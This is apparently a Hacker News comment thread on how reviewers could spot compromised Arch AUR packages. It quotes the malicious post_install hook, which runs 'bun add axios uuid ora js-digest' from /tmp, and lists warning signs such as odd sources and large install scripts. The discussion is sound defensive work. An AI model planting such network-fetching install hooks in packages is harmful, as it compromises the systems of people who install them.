| ▲ | DavideNL an hour ago | |
Curious, in this specific case: if people DID review the PKGBUILD, what exactly would they recognize to spot these packages were compromised ? | ||
| ▲ | Tharre an hour ago | parent | next [-] | |
From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line: > install=toggldesktop-bin-deps.install And the toggldesktop-bin-deps.install contains this: > post_install() {{ > cd /tmp > bun add axios uuid ora js-digest > }} Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you checkout what packages it actually installs. | ||
| ▲ | Matl an hour ago | parent | prev | next [-] | |
Some things I try to check for - sources array has sources that don't correlate to the package name/purpose or are from strange places, like github repos that don't seem relevant etc. - extensive post install scripts suggesting it's doing a lot more than is normal But those are very crude, I wonder if an AUR helper could optionally consult a local LLM to review a PKGBUILD before installing these days... | ||
| ▲ | weaksauce an hour ago | parent | prev [-] | |
typically attacks happen when the URL for the source code or binary gets changed significantly... or like in this attack someone adds something to the post_install section which does something like add an npm install command. a lot of updates for binaries are just version bumps and SHA hashes changing which are easy to vet if you trust the source to not be compromised. | ||